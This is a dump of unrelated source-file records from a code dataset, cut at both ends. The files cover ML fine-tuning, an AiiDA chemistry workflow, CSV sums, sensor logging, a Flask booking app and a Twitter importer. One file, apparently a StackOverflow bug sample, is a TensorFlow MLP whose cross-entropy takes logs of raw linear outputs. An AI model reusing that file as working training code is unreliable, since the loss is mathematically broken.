sys.stdout.write(str(decoded_labels))\r\n sys.stdout.write('\\n')\r\n sys.stdout.write(\"Model Prediction - Translated Sentence : \")\r\n sys.stdout.write(str(decoded_preds))\r\n sys.stdout.write('\\n')\r\n\r\n # calculate test score\r\n test_score = test_score / test_batch_num\r\n\r\n # Evaluate summaries with period of display_steps\r\n sys.stdout.write(f\"Test Phase | Best Epoch: {best_model_epoch+1} | score : {test_score}\\n\")\r\n\r\n # save best model\r\n save_bestmodel(best_model,self.optimizer,self.args,\r\n os.path.join(self.args.final_model_path,\"bestmodel.pth\"))\r\n\r\n return best_model\r\n\r\n def plot(self, training_history, validation_history):\r\n step = np.linspace(0,self.n_epoch,self.n_epoch)\r\n plt.plot(step,np.array(training_history),label='Training')\r\n plt.plot(step,np.array(validation_history),label='Validation')\r\n plt.xlabel('number of epochs')\r\n plt.ylabel('Loss')\r\n plt.legend()\r\n plt.show()\r\n\r\n cur_path = os.getcwd()\r\n save_dir = os.path.join(cur_path,'plot')\r\n path = os.path.join(save_dir, 'train_validation_plot.png')\r\n sys.stdout.write('Image of train, validation history saved as plot png!\\n')\r\n \r\n plt.savefig(path)\r\n\r\n def build_directory(self):\r\n # Making directory to store model pth\r\n curpath = os.getcwd()\r\n weightpath = os.path.join(curpath,'weights')\r\n os.makedirs(weightpath, exist_ok=True)\r\n\r\n def set_random(self, seed_num):\r\n set_random_fixed(seed_num)\r\n\r\n","sub_path":"src/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":20434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"245720395","text":"from aiida.common.example_helpers import test_and_get_code # noqa\nfrom aiida.orm.data.structure import StructureData # noqa\nfrom aiida.orm.data.parameter import ParameterData # noqa\nfrom aiida.orm.data.base import Str\nfrom aiida.work.run import submit\n\nfrom ase.io import read\nfrom charges import DdecChargesWorkChain\n\natoms = read('Fe-MOF-74_h111.xyz')\natoms.cell = [[6.96775, 0.00000, 0.00000],\n [-2.33067, 15.22261, 0.00000],\n [ -2.32566, -7.57517, 13.22945]]\n\n
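# NOTE: a plain .xyz file carries no lattice information, so the cell vectors are\n# assigned by hand above; assuming standard ASE, an equivalent call would be\n# atoms.set_cell([[6.96775, 0.0, 0.0], [-2.33067, 15.22261, 0.0], [-2.32566, -7.57517, 13.22945]])\n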
structure = StructureData(ase=atoms)\nstructure.store()\n\ncp2k_options_dict = {\n \"resources\": {\n \"num_machines\": 2,\n },\n \"max_wallclock_seconds\": 8 * 60 * 60,\n }\n\nddec_options_dict = {\n \"resources\": {\n \"num_machines\": 1,\n },\n \"max_wallclock_seconds\": 8 * 60 * 60,\n \"withmpi\": False,\n }\ncp2k_options = ParameterData(dict=cp2k_options_dict)\nddec_options = ParameterData(dict=ddec_options_dict)\ncp2k_code = test_and_get_code('cp2k@fidis', expected_code_type='cp2k')\nddec_code = test_and_get_code('ddec@fidis', expected_code_type='ddec')\nsubmit(DdecChargesWorkChain,\n structure=structure,\n cp2k_code=cp2k_code,\n cp2k_options=cp2k_options,\n ddec_code=ddec_code,\n ddec_options=ddec_options,\n ) \n","sub_path":"workflows/charges/run_charges_workflow.py","file_name":"run_charges_workflow.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"179518746","text":"# csv-dedicated library -> part of the standard library\nimport csv\n\nwith open(\"../day7/점수.txt\", mode=\"r\", encoding=\"utf-8\") as f:\n f_csv = csv.reader(f) # csv.reader(file) reads the file as CSV and returns a csv reader object, an iterable of row lists\n header = next(f_csv) # next(csv reader object) can be used to drop the first line (the header)\n kor_list = []\n eng_list = []\n math_list = []\n for row in f_csv:\n kor, eng, math = row\n kor_list.append(int(kor))\n eng_list.append(int(eng))\n math_list.append(int(math))\n print(sum(kor_list))\n print(sum(eng_list))\n print(sum(math_list))","sub_path":"day8/sample23_file10_csv.py","file_name":"sample23_file10_csv.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"346372987","text":"from threading import Thread\r\nimport pyupm_i2clcd\r\nimport logging\r\nimport json\r\nimport extractor\r\nimport time\r\nfrom sql import SQL\r\nimport Queue\r\nfrom datetime import datetime\r\n\r\n\r\nclass PROCESSOR(Thread):\r\n \"\"\"thread that gets data from the queue, saves it to \r\n a file if gps has a fix and displays it on the i2c screen\r\n \"\"\"\r\n def __init__(self, queue, exit_queue, message_queue, name, data_directory):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n self.name = name\r\n self.exitQueue = exit_queue\r\n self.message_queue = message_queue\r\n self.db = SQL(data_directory,'pmdatalog.db')\r\n self.data_dictionary = extractor.Extractor()\r\n self.filename = data_directory + '%s_%s.txt'\r\n\r\n def run(self):\r\n logging.debug(\"PROCESSOR thread started!\")\r\n self.message_queue.put('Data processor started, waiting for GPS.')\r\n\r\n create_file_flag = True\r\n last_time_for_update = '00:00:00'\r\n\r\n while True:\r\n if not self.exitQueue.empty():\r\n break\r\n\r\n try:\r\n dictionary_item = self.queue.get(False)\r\n self.queue.task_done()\r\n if 'bmp' in dictionary_item:\r\n self.data_dictionary.extract_bmp280(dictionary_item['bmp'])\r\n elif 'gps' in dictionary_item:\r\n self.data_dictionary.extract_gps(dictionary_item['gps'])\r\n elif 'pm' in dictionary_item:\r\n self.data_dictionary.extract_particle(dictionary_item['pm'])\r\n else:\r\n pass\r\n except Queue.Empty:\r\n # nothing to do and avoiding blocking behavior\r\n time.sleep(0.1)\r\n pass\r\n\r\n # waiting for the needed keys to appear in the dictionary\r\n if self.data_dictionary.all_components_updated and self.data_dictionary.data['gps_qual'] in [1, 2] \\\r\n and last_time_for_update != self.data_dictionary.data[\"time\"]:\r\n # 0 means NO FIX, 1 means GPS fix, 2 indicates DGPS\r\n if 
create_file_flag:\r\n self.filename = self.filename % (self.data_dictionary.data[\"date\"], self.data_dictionary.data[\"time\"].replace(':', '-'))\r\n self.db.new_session()\r\n create_file_flag = False\r\n # save row in database once a second\r\n last_time_for_update = self.data_dictionary.data[\"time\"]\r\n self.db.save_row(self.data_dictionary.data)\r\n\r\n with open(self.filename, 'a') as f:\r\n data = json.dumps(self.data_dictionary.data, sort_keys=True)\r\n logging.debug('writing %d bytes to SD card' % len(data))\r\n # what are the odds of a SD card failure\r\n f.write(data + '\\n')\r\n # also add data to the message queue\r\n self.message_queue.put(self.data_dictionary.data)\r\n logging.debug(\"PROCESSOR thread exited!\")\r\n\r\n\r\n","sub_path":"classes/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40134771","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nassert tf.__version__ == \"1.8.0\"\ntf.set_random_seed(20180130)\n\nmnist = input_data.read_data_sets(\"/tmp/data\", one_hot=True)\n# one hidden layer MLP\n\nx = tf.placeholder(tf.float32, shape=[None, 784])\ny = tf.placeholder(tf.float32, shape=[None, 10])\n\nW_h1 = tf.Variable(tf.random_normal([784, 512]))\nh1 = tf.nn.sigmoid(tf.matmul(x, W_h1))\n\nW_out = tf.Variable(tf.random_normal([512, 10]))\ny_ = tf.matmul(h1, W_out)\n\n# cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(y_, y)\ncross_entropy = tf.reduce_sum(- y * tf.log(y_) - (1 - y) * tf.log(1 - y_), 1)\nloss = tf.reduce_mean(cross_entropy)\ntrain_step = tf.train.GradientDescentOptimizer(0.05).minimize(loss)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# train\nwith tf.Session() as s:\n s.run(tf.initialize_all_variables())\n\n for i in range(10000):\n batch_x, batch_y = mnist.train.next_batch(100)\n s.run(train_step, feed_dict={x: batch_x, y: batch_y})\n\n if i % 100 == 0:\n loss1, train_accuracy = s.run([loss, accuracy], feed_dict={x: batch_x, y: batch_y})\n print('step {0}, training accuracy {1}, loss {2}'.format(i, train_accuracy, loss1))\n","sub_path":"StackOverflow/IPS-7/35078027-buggy/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40305952","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom flask_migrate import Migrate\nimport sys\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\n\n# TODO: connect to a local postgresql database\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n#----------------------------------------------------------------------------#\n# 
Models.\n#----------------------------------------------------------------------------#\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n\nclass Show(db.Model):\n    __tablename__ = 'Show'\n    id = db.Column(db.Integer, primary_key=True)\n    artist_id = db.Column('artist_id',db.Integer,db.ForeignKey('Artist.id'), nullable=False)\n    venue_id = db.Column('venue_id',db.Integer,db.ForeignKey('Venue.id'), nullable=False)\n    start_time = db.Column('start_time', db.TIMESTAMP, nullable=False)\n    venue = db.relationship(\"Venue\",backref=\"Artist\")\n    artist = db.relationship(\"Artist\",backref=\"Venue\")\n\n    def __repr__(self):\n        return f'<Show {self.id}>'\n\nclass Venue(db.Model):\n    __tablename__ = 'Venue'\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String)\n    city = db.Column(db.String(120))\n    state = db.Column(db.String(120))\n    address = db.Column(db.String(120))\n    phone = db.Column(db.String(120))\n    image_link = db.Column(db.String(500))\n    facebook_link = db.Column(db.String(120))\n\n    # TODO: implement any missing fields, as a database migration using Flask-Migrate\n    genres = db.Column(db.ARRAY(db.String))\n    website = db.Column(db.String(120))\n    seeking_talent = db.Column(db.Boolean)\n    seeking_description = db.Column(db.String(120))\n    artist = db.relationship(\"Show\",backref=\"Venue\")\n\n    def __repr__(self):\n        return f'<Venue {self.id} {self.name}>'\n\nclass Artist(db.Model):\n    __tablename__ = 'Artist'\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String)\n    city = db.Column(db.String(120))\n    state = db.Column(db.String(120))\n    phone = db.Column(db.String(120))\n    image_link = db.Column(db.String(500))\n    facebook_link = db.Column(db.String(120))\n\n    # TODO: implement any missing fields, as a database migration using Flask-Migrate\n    genres = db.Column(db.ARRAY(db.String))\n    website = db.Column(db.String(120))\n    seeking_venue = db.Column(db.Boolean)\n    seeking_description = db.Column(db.String(120))\n    venues = db.relationship(\"Show\",backref=\"Artist\")\n\n    def __repr__(self):\n        return f'<Artist {self.id} {self.name}>'\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n  date = dateutil.parser.parse(value)\n  if format == 'full':\n      format=\"EEEE MMMM, d, y 'at' h:mma\"\n  elif format == 'medium':\n      format=\"EE MM, dd, y h:mma\"\n  return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n  return render_template('pages/home.html')\n\n\n#  Venues\n#  ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n  # TODO: replace with real venues data.\n  # num_shows should be aggregated based on number of upcoming shows per venue.\n  data = []\n  ven = db.session.query(Venue.city,Venue.state).group_by('city','state').all()\n  for city in ven:\n    venueInfo = db.session.query(Venue.id,Venue.name).filter_by(city=city[0], state=city[1])\n    infos = []\n    for info in venueInfo:\n      num = getNumUpcomingShows(info[0]) \n      infos.append({'id':info[0],\"name\":info[1],\"num_upcoming_shows\":num})\n    col = {\"city\":city[0], \"state\":city[1],\"venues\":infos}\n    data.append(col)\n  \n  return 
render_template('pages/venues.html', areas=data)\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n  # TODO: implement search on venues with partial string search. Ensure it is case-insensitive.\n  # search for \"Hop\" should return \"The Musical Hop\".\n  # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n  term = request.form.get('search_term')\n  res = db.session.query(Venue.id,Venue.name).filter(Venue.name.ilike('%'+term+'%')).all()\n  data = []\n  for i in res:\n    num = getNumUpcomingShows(i[0])\n    data.append({\"id\":i[0],\"name\":i[1],\"num_upcoming_shows\": num }) \n  response={\n    \"count\": len(res),\n    \"data\":data\n  }\n  return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n  # shows the venue page with the given venue_id\n  # TODO: replace with real venue data from the venues table, using venue_id\n  _data = db.session.query(Venue).get(venue_id)\n  upcoming_shows_count ,upcoming_shows = getNumUpcomingShows(venue_id,'ven', 1)\n  past_shows_count ,past_shows = getNumPastShows(venue_id,'ven',1)\n  data1={\n    \"id\": _data.id,\n    \"name\": _data.name,\n    \"genres\": _data.genres,\n    \"address\": _data.address,\n    \"city\": _data.city,\n    \"state\": _data.state,\n    \"phone\": _data.phone,\n    \"website\": _data.website,\n    \"facebook_link\":_data.facebook_link,\n    \"seeking_talent\": _data.seeking_talent,\n    \"seeking_description\": _data.seeking_description,\n    \"image_link\":_data.image_link,\n    \"past_shows\":past_shows,\n    \"upcoming_shows\": upcoming_shows,\n    \"past_shows_count\": past_shows_count,\n    \"upcoming_shows_count\": upcoming_shows_count,\n  }\n  \n  #data = list(filter(lambda d: d['id'] == venue_id, [data1, data2, data3]))[0]\n  return render_template('pages/show_venue.html', venue=data1)\n\n#  Create Venue\n#  ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n  form = VenueForm()\n  return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n  # TODO: insert form data as a new Venue record in the db, instead\n  err =0\n\n  if \"seeking_talent\" in request.form.keys():\n    f = True\n  else:\n    f = False\n\n  ven = Venue(name = request.form['name'],city=request.form['city'].upper(),state=request.form['state'],\n        address=request.form['address'],phone=request.form['phone'],genres=request.form.getlist('genres'),\n        facebook_link=request.form['facebook_link'],image_link=request.form['image_link'],\n        website=request.form['website'],seeking_talent=f,seeking_description=request.form['seeking_talent_description'] )\n  form = VenueForm(obj = ven)\n  if form.validate() :\n    try:\n      db.session.add(ven)\n      db.session.commit()\n    except:\n      db.session.rollback()\n      print(sys.exc_info())\n      err =1\n    finally:\n      db.session.close()\n    \n    # TODO: modify data to be the data object returned from db insertion\n    if err == 0:\n      name = db.session.query(Venue.name).filter_by(name=request.form['name']).order_by(db.desc(Venue.id)).first()[0]\n      # on successful db insert, flash success\n      flash('Venue ' + name + ' was successfully listed!')\n    else:\n      # TODO: on unsuccessful db insert, flash an error instead.\n      flash('An error occurred. 
Venue ' + request.form['name'] + ' could not be listed.')\n    return render_template('pages/home.html')\n  else:\n    if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n    if form.errors.__contains__('website'): flash(form.errors['website'][0])\n    if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n    return render_template('forms/new_venue.html', form=form)\n\n\n\n@app.route('/venues/delete/<venue_id>', methods=['GET','DELETE'])\ndef delete_venue(venue_id):\n\n  # TODO: Complete this endpoint for taking a venue_id, and using\n  # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n  err=0\n  try:\n    db.session.query(Show).filter_by(venue_id=venue_id).delete()\n    db.session.query(Venue).filter_by(id=venue_id).delete()\n    db.session.commit()\n  except:\n    db.session.rollback()\n    print(sys.exc_info())\n    err = 1\n  finally:\n    db.session.close()\n  \n  if err == 0:\n    flash(\"Venue Deleted Successfully\")\n  else:\n    flash(\"Error!! Could not delete Venue\")\n\n  # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n  # clicking that button delete it from the db then redirect the user to the homepage\n  return render_template('pages/home.html')\n\n#  Artists\n#  ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n  # TODO: replace with real data returned from querying the database\n  data = db.session.query(Artist.id,Artist.name).all()\n  return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n  # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n  # search for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n  # search for \"band\" should return \"The Wild Sax Band\".\n  term = request.form.get('search_term')\n  res = db.session.query(Artist.id,Artist.name).filter(Artist.name.ilike(\"%\"+term+\"%\")).all()\n  _data = []\n  for i in res:\n    num_upcoming_shows = getNumUpcomingShows(i[0],'art')\n    _data.append({\"id\":i[0],\"name\":i[1],\"num_upcoming_shows\": num_upcoming_shows })\n  response={\n    \"count\": len(res),\n    \"data\":_data\n  }\n\n  return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n  # shows the artist page with the given artist_id\n  # TODO: replace with real artist data from the artist table, using artist_id\n  _data = db.session.query(Artist).get(artist_id)\n  upcoming_shows_count ,upcoming_shows = getNumUpcomingShows(artist_id,'art', 1)\n  past_shows_count ,past_shows = getNumPastShows(artist_id,'art',1)\n  data={\n    \"id\": _data.id,\n    \"name\":_data.name,\n    \"genres\": _data.genres,\n    \"city\": _data.city,\n    \"state\": _data.state,\n    \"phone\": _data.phone,\n    \"website\": _data.website,\n    \"facebook_link\": _data.facebook_link,\n    \"seeking_venue\": _data.seeking_venue,\n    \"seeking_description\": _data.seeking_description,\n    \"image_link\": _data.image_link,\n    \"past_shows\": past_shows,\n    \"upcoming_shows\": upcoming_shows,\n    \"past_shows_count\": past_shows_count,\n    \"upcoming_shows_count\": upcoming_shows_count,\n  }\n  \n  # data = list(filter(lambda d: d['id'] == artist_id, [data1, data2, data3]))[0]\n  return render_template('pages/show_artist.html', artist=data)\n\n#  Update\n#  ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', 
methods=['GET'])\ndef edit_artist(artist_id):\n\n  artist = Artist.query.get(artist_id)\n  # TODO: populate form with fields from artist with ID <artist_id>\n  form = ArtistForm(obj = artist)\n  return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n  # TODO: take values from the form submitted, and update existing\n  # artist record with ID <artist_id> using the new attributes\n  err = 0\n  if \"seeking_venue\" in request.form.keys():\n    f = True\n  else:\n    f = False\n  # avoid shadowing the builtin dict()\n  data = {\n    \"name\":request.form['name'],\n    \"city\":request.form['city'],\n    \"state\":request.form['state'],\n    \"phone\":request.form['phone'],\n    \"genres\":request.form.getlist('genres'),\n    \"facebook_link\":request.form['facebook_link'],\n    \"image_link\":request.form['image_link'],\n    \"website\":request.form['website'],\n    \"seeking_venue\":f,\n    \"seeking_description\":request.form['seeking_venue_description'] }\n  form = ArtistForm(obj=request.form)\n  if form.validate():\n    try:\n      db.session.query(Artist).filter_by(id=artist_id).update(data)\n      db.session.commit()\n    except:\n      db.session.rollback()\n      print(sys.exc_info())\n      err = 1\n    finally:\n      db.session.close()\n    \n    if err == 0:\n      flash(\"Updated Successfully\")\n    else:\n      flash(\"Error!! Not Updated\")\n    \n    return redirect(url_for('show_artist', artist_id=artist_id))\n  else:\n    if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n    if form.errors.__contains__('website'): flash(form.errors['website'][0])\n    if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n    return render_template('forms/new_artist.html', form=form)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n  ven = Venue.query.get(venue_id)\n  # TODO: populate form with fields from venue with ID <venue_id>\n  form = VenueForm(obj = ven)\n  \n  # TODO: populate form with values from venue with ID <venue_id>\n  return render_template('forms/edit_venue.html', form=form, venue=ven)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n  # TODO: take values from the form submitted, and update existing\n  # venue record with ID <venue_id> using the new attributes\n  err = 0\n  \n  if \"seeking_talent\" in request.form.keys():\n    f = True\n  else:\n    f = False\n  # avoid shadowing the builtin dict()\n  data = {\n    \"name\":request.form['name'],\n    \"city\":request.form['city'],\n    \"state\":request.form['state'],\n    \"phone\":request.form['phone'],\n    \"genres\":request.form.getlist('genres'),\n    \"facebook_link\":request.form['facebook_link'],\n    \"address\":request.form['address'],\n    \"image_link\":request.form['image_link'],\n    \"website\":request.form['website'],\n    \"seeking_talent\":f,\n    \"seeking_description\":request.form['seeking_talent_description']\n    } \n  form = VenueForm(obj=request.form)\n  if form.validate() :\n    try:\n      db.session.query(Venue).filter_by(id=venue_id).update(data)\n      db.session.commit()\n    except:\n      db.session.rollback()\n      print(sys.exc_info())\n      err = 1\n    finally:\n      db.session.close()\n    \n    if err == 0:\n      flash(\"Updated Successfully\")\n    else:\n      flash(\"Error!! 
Not Updated\")\n\n return redirect(url_for('show_venue', venue_id=venue_id))\n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_venue.html', form=form)\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n err =0\n if \"seeking_venue\" in request.form.keys():\n f = True\n else:\n f = False\n\n art = Artist(name = request.form['name'],city=request.form['city'].upper(),state=request.form['state'],\n phone=request.form['phone'],genres=request.form.getlist('genres'),\n facebook_link=request.form['facebook_link'],image_link=request.form['image_link'],\n seeking_venue=f,seeking_description=request.form['seeking_venue_description'] )\n form = ArtistForm(obj = art)\n if form.validate() :\n try:\n db.session.add(art)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err =1\n finally:\n db.session.close()\n \n # TODO: modify data to be the data object returned from db insertion\n if err == 0:\n name = db.session.query(Artist.name).filter_by(name=request.form['name']).order_by(db.desc(Artist.id)).first()[0]\n # on successful db insert, flash success\n flash('Artist ' + name + ' was successfully listed!')\n else:\n # TODO: on unsuccessful db insert, flash an error instead.\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n return render_template('pages/home.html')\n \n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_artist.html', form=form)\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # num_shows should be aggregated based on number of upcoming shows per venue.\n data = []\n shows_data = db.session.query(Show).all()\n for show in shows_data:\n art = db.session.query(Artist.name,Artist.id,Artist.image_link).filter_by(id=show.artist_id).all()\n ven = db.session.query(Venue.name,Venue.id).filter_by(id=show.venue_id).all()\n data.append({\n \"venue_id\": ven[0][1],\n \"venue_name\": ven[0][0],\n \"artist_id\": art[0][1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][2],\n \"start_time\": str(show.start_time)\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. 
do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n sh = Show(artist_id=request.form['artist_id'],venue_id=request.form['venue_id'],\n start_time=request.form['start_time'])\n err=0\n try:\n db.session.add(sh)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err =1\n finally:\n db.session.close()\n \n # TODO: modify data to be the data object returned from db insertion\n if err == 0:\n flash('Show was successfully listed!')\n else:\n flash('An error occurred. Show could not be listed.')\n\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\ndef getNumUpcomingShows(id, idType='ven', get_data=0):\n \n if idType=='ven':\n shows = db.session.query(Show.start_time,Show.artist_id).filter_by(venue_id = id).all()\n elif idType=='art':\n shows = db.session.query(Show.start_time,Show.venue_id).filter_by(artist_id = id).all()\n num = 0\n cur = datetime.today()\n info = []\n for show in shows:\n \n if (show[0].date() > cur.date() ) or (show[0].date() == cur.date() and show[0].time() > cur.time() ):\n num = num +1\n if idType == 'ven':\n art = db.session.query(Artist.name,Artist.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"artist_id\": show[1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][1],\n \"start_time\": str(show[0])\n })\n elif idType == 'art':\n ven = db.session.query(Venue.name,Venue.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"venue_id\": show[1],\n \"venue_name\": ven[0][0],\n \"venue_image_link\": ven[0][1],\n \"start_time\": str(show[0])\n })\n if get_data == 1:\n return num,info\n return num\n\ndef getNumPastShows(id, idType='ven', get_data=0):\n if idType=='ven':\n shows = db.session.query(Show.start_time,Show.artist_id).filter_by(venue_id = id).all()\n elif idType=='art':\n shows = db.session.query(Show.start_time,Show.venue_id).filter_by(artist_id = id).all()\n num = 0\n cur = datetime.today()\n info = []\n for show in shows:\n if (show[0].date() < cur.date() ) or (show[0].date() == cur.date() and show[0].time() < cur.time() ):\n num = num +1\n if idType == 'ven':\n art = db.session.query(Artist.name,Artist.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"artist_id\": show[1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][1],\n \"start_time\": str(show[0])\n })\n elif idType == 'art':\n ven = db.session.query(Venue.name,Venue.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"venue_id\": show[1],\n \"venue_name\": ven[0][0],\n \"venue_image_link\": ven[0][1],\n \"start_time\": str(show[0])\n })\n if get_data == 1:\n return num,info\n return num\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# 
Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","sub_path":"projects/01_fyyur/starter_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"187959876","text":"import intlekt_importation.mongo as mongo\nimport urllib\nimport tweepy\nimport re\nfrom datetime import datetime\nfrom intlekt_importation.default_settings import CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET, MISSING_IMAGE\n\n\ndef authenticate():\n \"\"\"\n Returns\n -------------\n tweepy.api.API object for twitter requests\n \"\"\"\n auth=tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n api=tweepy.API(auth, wait_on_rate_limit = True, wait_on_rate_limit_notify = True)\n return api\n\ndef get_list_url(user, slug):\n \"\"\"\n Parameters\n -------------\n user: str\n Twitter username\n slug: str\n Twitter list slug\n Returns\n -------------\n str: URL for the given twitter list slug\n \"\"\"\n return 'https://twitter.com/' + user + '/lists/' + slug\n\ndef get_user_url(user):\n \"\"\"\n Parameters\n -------------\n user: str\n Twitter username\n Returns\n -------------\n str: URL for the given twitter username\n \"\"\"\n return 'https://twitter.com/' + user\n\ndef get_search_url(search):\n \"\"\"\n Parameters\n -------------\n user: str\n search content\n Returns\n -------------\n str: URL for the given search content\n \"\"\"\n url = 'https://twitter.com/search?f=tweets&q=' + search\n return urllib.parse.quote(url, safe = \"!*'();:@&=+$,/?#[]\")\n\n\ndef get_source_array(tweet):\n source_array=['']\n for source_id in range(len(tweet.entities['urls'])):\n source_array.append('s:' + str(source_id))\n return source_array\n\n\ndef get_hashtags(tweet):\n hashtags={}\n for tag in tweet.entities['hashtags']:\n hashtags[tag['text']] = ''\n return hashtags\n\n\ndef get_image(tweet):\n if 'media' in tweet.entities.keys():\n image=tweet.entities['media'][0]['media_url']\n else:\n image=MISSING_IMAGE\n return image\n\n\ndef get_tweet_json(tweet, source_url):\n return {\n 'collected_on': tweet.created_at.strftime('%Y-%m-%d'),\n 'tags': get_hashtags(tweet),\n 'image': get_image(tweet),\n 'description': re.sub(r'http\\S+', '', tweet.text),\n 'page_url': tweet.entities['urls'][0]['expanded_url'],\n 'url': source_url\n }\n\n\ndef get_posts(tweet_cursor, tweet_count, time_limit, only_source, languages):\n \"\"\"\n Parameters\n -------------\n tweet_cursor: 